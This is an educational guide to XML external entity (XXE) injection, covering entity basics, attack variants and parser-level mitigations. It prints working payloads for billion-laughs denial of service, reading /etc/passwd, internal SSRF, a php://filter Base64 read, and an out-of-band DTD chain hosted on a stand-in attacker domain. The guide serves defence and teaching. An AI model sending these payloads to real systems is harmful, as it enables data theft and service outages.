XML external entity (XXE) vulnerabilities (also called XML external entity injections or XXE injections) happen if a web application or API accepts unsanitized XML data and its back-end XML parser is configured to allow external XML entity parsing. XXE vulnerabilities can let malicious hackers perform attacks such as server-side request forgery (SSRF), local file inclusion (LFI), directory traversal, remote code execution (RCE), network port scanning, and denial of service (DoS).
Severity: | severe |
Prevalence: | discovered rarely |
Scope: | may appear in web apps and APIs that accept XML input |
Technical impact: | SSRF, LFI, RCE, DoS |
Worst-case consequences: | full system compromise |
Quick fix: | configure the XML parser to disallow XML external entities |
Note that XXE vulnerabilities were first featured in the OWASP Top 10 list in 2017 and immediately made it to the A4 spot. In the OWASP Top 10 for 2021, they are grouped with security misconfigurations under A5.
For XXE attacks to be possible, a web application or API must accept XML input and process it with an XML parser that is configured to resolve external entities.
To understand what makes this security vulnerability possible, we need to start with some XML basics.
Web applications and APIs often use the extensible markup language (XML) to communicate with one another and to accept structured data from users.
To provide such functionality, the web application or API uses a back-end XML parser, usually an imported library written in the same language as the application. Examples include SimpleXML for PHP, DocumentBuilder for Java, ElementTree for Python, XmlReader for .NET, and DOMParser for JavaScript.
To check that XML input has the expected form, you can declare the structure of valid input documents. With such a declaration, the parser can determine whether the input data is a valid XML document of the expected type before processing its content. There are two formats for defining the document type: the more powerful and complex XML schema definitions (XSD) and the simpler, older document type definitions (DTD). DTDs are sometimes considered outdated (they are derived from SGML, the ancestor of XML), but they are still widely used.
XML entities are named placeholders that stand for a piece of text, such as characters that are not easily typed or that have a special meaning in XML. Entities are defined in a DTD using the <!ENTITY> declaration. To refer to a defined entity, you use its name preceded by an ampersand (&) and followed by a semicolon (;). You may be familiar with entities in HTML, for example, &amp; and &nbsp;.
One use for XML entities in DTDs is to incorporate external content or references into the DTD itself, or into documents that use the DTD. Such inclusions are called external XML entities (XXE). XXEs can be abused by malicious hackers to access local files, URLs on a local network, and more.
There are three basic types of XXE attacks: in-band XXE, out-of-band (OOB) XXE, and blind XXE.
In this guide, we will focus on in-band XXE attacks, but the techniques described here can also be used for OOB XXE and blind XXE attacks.
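XXE attacks are performed by defining malicious XML entities in user input that will be parsed by a back-end XML parser. Here is a simple (non-malicious) example of an XML entity definition. Its value is given directly in the DTD, so this is an internal entity; external entities, which load their content from elsewhere, are covered further below: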
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World">
]>
<foo>
Hello &bar;
</foo>
Response:
HTTP/1.0 200 OK
Hello World
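To experiment with this behavior without a web server, the request body can be fed directly to an XML parser. The sketch below assumes Python's standard-library xml.etree.ElementTree module, which expands internal entities declared in an inline DTD; the payload is the request body above without the HTTP request line.

```python
import xml.etree.ElementTree as ET

# Request body from the example above (HTTP request line omitted).
PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World">
]>
<foo>
Hello &bar;
</foo>"""

root = ET.fromstring(PAYLOAD)
# The parser has already replaced &bar; with its declared value.
print(root.text.strip())  # Hello World
```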
XML entity definitions can themselves reference other entities. This allows an attacker to create a nested structure that requires very little input data but expands into a lot of output. Such output may be used to exhaust the XML processor's memory and potentially even overload the web server. By extending the following example with more levels of entities, an attacker could easily create an entity so large that it would exhaust the memory of any XML parser that expands entities without limits, resulting in a denial of service. This technique is widely known as the billion laughs attack.
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World ">
<!ENTITY t1 "&bar;&bar;">
<!ENTITY t2 "&t1;&t1;&t1;&t1;">
<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
Hello &t3;
</foo>
Response:
HTTP/1.0 200 OK
Hello World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World
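The size of the expansion is the product of the fan-outs at each level: bar is referenced 2 × 4 × 5 = 40 times, which matches the 40 copies of "World" in the response. A minimal Python sketch, assuming the standard-library ElementTree parser for the small payload above and a hypothetical helper, expanded_length, that estimates the size of deeper payloads without actually expanding them:

```python
import xml.etree.ElementTree as ET

# Request body from the example above.
PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World ">
<!ENTITY t1 "&bar;&bar;">
<!ENTITY t2 "&t1;&t1;&t1;&t1;">
<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
Hello &t3;
</foo>"""

words = ET.fromstring(PAYLOAD).text.split()
print(words.count("World"))  # 40, i.e. 2 * 4 * 5 copies of "World "


def expanded_length(base_len: int, fanouts: list[int]) -> int:
    """Characters produced by fully expanding the outermost entity:
    the base string length times the fan-out of every nesting level."""
    length = base_len
    for fanout in fanouts:
        length *= fanout
    return length


print(expanded_length(6, [2, 4, 5]))  # 240 characters for the payload above
print(expanded_length(3, [10] * 9))   # 3000000000 for the classic "billion laughs"
```

Each additional level multiplies the output while the payload grows by only one short line, which is why limiting the size of the XML input alone does not prevent this attack.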
External entity definitions can use URL schemes such as file: in their system identifiers. As a result, an attacker can reference any file in the local file system that the web server process can read, for example /etc/passwd or one of the web application's source code files. The results of such an attack are similar to a local file inclusion attack combined with directory traversal.
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
Response:
HTTP/1.0 200 OK
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
(...)
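The following Python sketch reproduces the file inclusion mechanism on a local machine. Python's xml.sax parser stopped resolving external general entities by default in Python 3.7.1, so the sketch deliberately re-enables the feature_external_ges feature to mimic a misconfigured parser. To avoid touching real system files, it reads a temporary stand-in for /etc/passwd; the helper names (TextCollector, build_payload, parse_with_external_entities) are illustrative. For contrast, it also feeds the same payload to ElementTree, which does not fetch external entities and raises a ParseError instead.

```python
import io
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data the parser reports."""

    def __init__(self) -> None:
        super().__init__()
        self.chunks: list[str] = []

    def characters(self, content: str) -> None:
        self.chunks.append(content)


def build_payload(uri: str) -> bytes:
    """Same shape as the request above, pointing at an arbitrary file URI."""
    return (
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY>\n"
        f'<!ENTITY xxe SYSTEM "{uri}">\n'
        "]>\n"
        "<foo>&xxe;</foo>"
    ).encode("utf-8")


def parse_with_external_entities(payload: bytes) -> str:
    """Simulates a misconfigured parser that resolves external entities."""
    parser = xml.sax.make_parser()
    # Off by default since Python 3.7.1; switched on here only for the demo.
    parser.setFeature(feature_external_ges, True)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(payload))
    return "".join(collector.chunks)


with tempfile.TemporaryDirectory() as tmp:
    # Stand-in for /etc/passwd so the demo never reads real system files.
    fake_passwd = Path(tmp) / "passwd"
    fake_passwd.write_text("root:x:0:0:root:/root:/bin/bash\n")
    payload = build_payload(fake_passwd.as_uri())

    leaked = parse_with_external_entities(payload)
    print(leaked, end="")  # root:x:0:0:root:/root:/bin/bash

    # ElementTree does not fetch external entities and rejects the reference.
    refused = False
    try:
        ET.fromstring(payload)
    except ET.ParseError as err:
        refused = True
        print("ElementTree refused the payload:", err)
```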
External entity definitions may also point to URLs on other hosts. Because the XML is parsed on the server, the request to that URL is made by the server itself, which makes this a form of server-side request forgery. The attacker can then reach resources on the internal network as if located inside that network, bypassing protections such as firewalls.
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"http://192.168.0.1/secret.txt">
]>
<foo>
&xxe;
</foo>
Response:
HTTP/1.0 200 OK
Content of the secret.txt file on the local network (behind the firewall)
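The key point of SSRF via XXE is that the parser, not the attacker, issues the request. The Python sketch below makes that visible without any network traffic: a hypothetical RecordingResolver (a custom xml.sax EntityResolver) logs each URL the parser asks for and answers with canned bytes that stand in for the internal server's response. External general entities are switched on deliberately to simulate a vulnerable configuration.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

# Request body from the example above.
PAYLOAD = b"""<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://192.168.0.1/secret.txt">
]>
<foo>&xxe;</foo>"""


class RecordingResolver(EntityResolver):
    """Stands in for the network: records each URL the parser asks for
    and answers with canned content instead of connecting anywhere."""

    def __init__(self) -> None:
        self.requested: list[str] = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(b"internal-only data"))
        return source


class TextCollector(ContentHandler):
    """Collects all character data the parser reports."""

    def __init__(self) -> None:
        super().__init__()
        self.chunks: list[str] = []

    def characters(self, content: str) -> None:
        self.chunks.append(content)


parser = xml.sax.make_parser()
parser.setFeature(feature_external_ges, True)  # the simulated misconfiguration
resolver = RecordingResolver()
collector = TextCollector()
parser.setEntityResolver(resolver)
parser.setContentHandler(collector)
parser.parse(io.BytesIO(PAYLOAD))

print(resolver.requested)         # ['http://192.168.0.1/secret.txt']
print("".join(collector.chunks))  # internal-only data
```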
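There is one major limitation when using XXE to exfiltrate data: the content of an external entity is itself parsed as XML, so if the exfiltrated data contains, or even only resembles, XML markup, the parser will try to interpret it. This can cause a parser error or scramble the exfiltrated data. In the following example, the header line of /etc/fstab contains text such as <file system>, which the parser reads as a malformed start tag: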
Request:
POST http://example.com/xml HTTP/1.1
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"file:///etc/fstab">
]>
<foo>
&bar;
</foo>
Response:
HTTP/1.0 500 Internal Server Error
File "file:///etc/fstab", line 3
lxml.etree.XMLSyntaxError: Specification mandates value for attribute system, line 3, column 15...
As a result, simple XXE attacks can only be used to obtain files or responses that are considered valid XML by the parser, meaning that you cannot use them to obtain binary files.
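The limitation can be demonstrated with a similar sketch: a hypothetical CannedResolver serves fixed bytes for the /etc/fstab entity, so no file is actually read. Plain text comes through intact, while a typical fstab header line containing <file system> makes the parser fail, because the included text is parsed as markup. This assumes Python's xml.sax with external general entities deliberately enabled; the try_exfiltrate helper is illustrative.

```python
import io
import xml.sax
from typing import Optional
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

# Request body from the example above.
PAYLOAD = b"""<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "file:///etc/fstab">
]>
<foo>&bar;</foo>"""


class CannedResolver(EntityResolver):
    """Serves fixed bytes for every external entity; no file is opened."""

    def __init__(self, body: bytes) -> None:
        self.body = body

    def resolveEntity(self, publicId, systemId):
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(self.body))
        return source


class TextCollector(ContentHandler):
    """Collects all character data the parser reports."""

    def __init__(self) -> None:
        super().__init__()
        self.chunks: list[str] = []

    def characters(self, content: str) -> None:
        self.chunks.append(content)


def try_exfiltrate(body: bytes) -> Optional[str]:
    """Returns the included text, or None if the parser rejects it."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # simulated misconfiguration
    parser.setEntityResolver(CannedResolver(body))
    collector = TextCollector()
    parser.setContentHandler(collector)
    try:
        parser.parse(io.BytesIO(PAYLOAD))
    except xml.sax.SAXParseException:
        return None
    return "".join(collector.chunks)


# A line without markup-like text survives the trip...
print(repr(try_exfiltrate(b"UUID=1234 / ext3 defaults 0 1\n")))
# ...but the usual fstab header line looks like a malformed start tag.
print(try_exfiltrate(b"# <file system> <mount point> <type>\n"))  # None
```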
XML itself includes a workaround for this problem. There are legitimate cases when you need to store XML special characters in XML documents, and for this purpose XML provides CDATA (character data) sections, which can contain any special characters:
<data><![CDATA[ < " ' & > characters are ok in here ]]></data>
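A quick check with Python's standard-library ElementTree (used here only as a convenient parser) shows the difference: inside a CDATA section the special characters are returned as literal text, while the same characters outside CDATA make the document malformed.

```python
import xml.etree.ElementTree as ET

# The example above, parsed as-is: the CDATA content comes back verbatim.
with_cdata = "<data><![CDATA[ < \" ' & > characters are ok in here ]]></data>"
print(repr(ET.fromstring(with_cdata).text))

# The same characters without the CDATA wrapper are not well-formed XML.
without_cdata = "<data> < \" ' & > characters are ok in here </data>"
try:
    ET.fromstring(without_cdata)
    rejected = False
except ET.ParseError:
    rejected = True
print(rejected)  # True
```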
In addition to general entities, XML also supports parameter entities. Parameter entities are only used in document type definitions (DTDs).
A parameter entity is declared and referenced using the % character instead of the ampersand. The % in the declaration tells the XML parser that a parameter entity is being defined, as opposed to a general entity. In the following non-malicious example, a parameter entity is used to define a general entity, which is then referenced from the XML document.
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % paramEntity
"<!ENTITY genEntity 'bar'>">
%paramEntity;
]>
<data>&genEntity;</data>
Response:
HTTP/1.0 200 OK
bar
By combining parameter entities and CDATA sections, an attacker can work around this limitation with a malicious DTD hosted at bad.example.com/evil.dtd:
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM
"http://bad.example.com/evil.dtd">
%dtd;
%all;
]>
<data>&fileContents;</data>
Attacker DTD (bad.example.com/evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/fstab">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents
'%start;%file;%end;'>">
When an attacker sends the above XXE payload, the XML parser first processes the %dtd parameter entity by making a request to http://bad.example.com/evil.dtd. After the attacker's DTD has been downloaded, the XML parser loads the %file parameter entity (from evil.dtd), which in this example points to /etc/fstab. Next, the parser wraps the contents of the file in the CDATA start and end markers defined by the %start and %end parameter entities. Finally, everything gets stored in yet another parameter entity called %all.
The heart of the trick is that %all actually defines a general entity called fileContents: referencing %all; in the request's DTD creates that entity, and the document body then includes it as &fileContents;. The end result is the contents of the /etc/fstab file wrapped in a CDATA section, so the parser no longer interprets any markup inside it. The attacker's DTD has to be hosted externally because the XML specification does not allow parameter entity references inside markup declarations in the internal DTD subset.
If the web application vulnerable to XXE is a PHP application, PHP protocol wrappers open up new attack vectors. PHP protocol wrappers (php://) give access to various I/O streams, including filters that transform data as it is read.
An attacker can use the php://filter wrapper to Base64-encode the contents of a file. Base64 output consists only of letters, digits, and the +, /, and = characters, none of which have a special meaning in XML, so the encoded data is always parsed as plain text. An attacker can simply encode files on the server and then decode them on the receiving end. Crucially, this method allows the attacker to steal binary files, too.
Request:
POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
&bar;
</foo>
Response:
HTTP/1.0 200 OK
IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0gaW5mb3JtYXRpb24uDQojDQojIDxmaWxlIHN5c3RlbT4gPG1vdW50IHBvaW50PiAgIDx0eXBlPiAgPG9wdGlvbnM+ICAgICAgIDxkdW1wPiAgPHBhc3M+DQoNCnByb2MgIC9wcm9jICBwcm9jICBkZWZhdWx0cyAgMCAgMA0KIyAvZGV2L3NkYTUNClVVSUQ9YmUzNWE3MDktYzc4Ny00MTk4LWE5MDMtZDVmZGM4MGFiMmY4ICAvICBleHQzICByZWxhdGltZSxlcnJvcnM9cmVtb3VudC1ybyAgMCAgMQ0KIyAvZGV2L3NkYTYNClVVSUQ9Y2VlMTVlY2EtNWIyZS00OGFkLTk3MzUtZWFlNWFjMTRiYzkwICBub25lICBzd2...
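Why Base64 survives the trip can be checked in a few lines of Python. The sketch assumes the encoded data simply ends up as the text content of an element, as in the response above: it encodes all 256 possible byte values, confirms the result uses only the Base64 alphabet, parses it as XML with ElementTree, and decodes it back. It also decodes the first 16 characters of the response above, which turn out to be the start of the /etc/fstab file.

```python
import base64
import string
import xml.etree.ElementTree as ET

# Every possible byte value, including b"<", b"&" and NUL, none of which
# could appear raw in the text content of an XML document.
binary = bytes(range(256))

encoded = base64.b64encode(binary).decode("ascii")
# The Base64 alphabet: A-Z, a-z, 0-9, "+", "/" and "=" for padding.
alphabet = set(string.ascii_letters + string.digits + "+/=")
print(set(encoded) <= alphabet)  # True: nothing the XML parser treats as markup

# The encoded string parses as ordinary element text...
root = ET.fromstring(f"<foo>{encoded}</foo>")
# ...and decodes back to the original bytes on the receiving end.
print(base64.b64decode(root.text) == binary)  # True

# The first 16 characters of the response above:
print(base64.b64decode("IyAvZXRjL2ZzdGFi"))  # b'# /etc/fstab'
```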
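If the XML parser used by a web application supports XML external entities, attackers can use the techniques described above to abuse XXE definitions and perform a variety of attacks, including denial of service, local file inclusion, server-side request forgery, and exfiltration of binary files.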
The best way to detect XXE vulnerabilities depends on whether they are already known or unknown.
Since XXE is considered a type of XML injection attack, some sources will simply recommend input validation and sanitization of XML documents through filtering and escaping to prevent potentially harmful content from being interpreted as XML. This also includes creating whitelists and blacklists for XML content. However, we do not recommend this approach since, due to the way that XML input is used by most applications, it is not practical to apply manual sanitization and validation.
A large part of XML communication between web applications and APIs (as well as communication with users) involves passing complete XML documents, so filtering and escaping all content in such documents is very troublesome and, unless done properly, can make the entire document invalid. Following OWASP documentation, we recommend that, instead of trying to prevent XXE in each application separately, developers and web server administrators work together to disallow XML external entities at the level of the XML parser, not the web application.
The only effective way to mitigate XXE attacks is to make sure that XML external entities are never processed in XML content coming from untrusted sources. OWASP additionally recommends completely disabling the processing of external document type definitions and restricting developers to static, local DTDs. If the functionality of your web application depends on the use of external DTDs, you can still prevent XXE attacks by disabling support for external entities in those DTDs.
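Where the parser allows it, the strictest option is to reject any document that contains a DOCTYPE declaration, because without a DTD no entities of any kind can be declared. A minimal Python sketch of this idea, assuming the standard-library expat bindings (xml.parsers.expat); the names DTDForbidden and parse_text_without_dtd are hypothetical, and the function only collects text content to keep the example short:

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when an untrusted document contains a DOCTYPE declaration."""


def parse_text_without_dtd(data: bytes) -> str:
    """Parses untrusted XML but refuses any document that declares a DTD,
    so no entity (internal or external) can ever be defined."""
    parser = xml.parsers.expat.ParserCreate()
    chunks: list[str] = []

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # Called as soon as <!DOCTYPE is seen, before any declaration in it.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)  # exceptions raised in handlers propagate here
    return "".join(chunks)


print(parse_text_without_dtd(b"<foo>Hello</foo>"))  # Hello

attack = b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
try:
    parse_text_without_dtd(attack)
except DTDForbidden as err:
    print("rejected:", err)
```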
To learn how to disable DTD and XXE processing in your specific XML parser, refer to the OWASP XML External Entity Prevention Cheat Sheet, which contains instructions for many commonly used programming languages and XML parsers.
Classification | ID |
---|---|
CAPEC | 201 |
CWE | 611 |
WASC | 43 |
OWASP 2021 | A5 |
XXE vulnerabilities are caused by the permissive configuration of XML parsers. XML parsers used by web servers often allow the use of XML entities from external sources. Attackers may abuse this feature and use XML external entities to include malicious content or access sensitive information.
External XML entities may allow an attacker to access confidential information as well as perform server-side request forgery (SSRF) attacks. In some cases, XXE may even enable port scanning or lead to remote code execution.
The best way to prevent XXE vulnerabilities is to completely disable support for document type definitions (DTDs) in your XML parser. If this is not possible, you need to at least disable support for external entities and external document type declarations for your parser.
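Where DTDs cannot be refused outright, external entity resolution should at least be switched off explicitly. A Python sketch, assuming the standard-library xml.sax parser: feature_external_ges is already off by default since Python 3.7.1, and setting it explicitly documents the intent. A hypothetical RecordingResolver shows that the parser never even tries to resolve the external entity, whose reference is simply left out of the text.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges


class RecordingResolver(EntityResolver):
    """Records every external entity the parser tries to resolve."""

    def __init__(self) -> None:
        self.requested: list[str] = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        return systemId  # default behaviour: let the parser open the URI


class TextCollector(ContentHandler):
    """Collects all character data the parser reports."""

    def __init__(self) -> None:
        super().__init__()
        self.chunks: list[str] = []

    def characters(self, content: str) -> None:
        self.chunks.append(content)


PAYLOAD = b"""<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>before &xxe; after</foo>"""

parser = xml.sax.make_parser()
# Already the default since Python 3.7.1; stated explicitly to document intent.
parser.setFeature(feature_external_ges, False)
resolver = RecordingResolver()
collector = TextCollector()
parser.setEntityResolver(resolver)
parser.setContentHandler(collector)
parser.parse(io.BytesIO(PAYLOAD))

print(resolver.requested)                  # []
print("".join(collector.chunks).split())  # ['before', 'after']
```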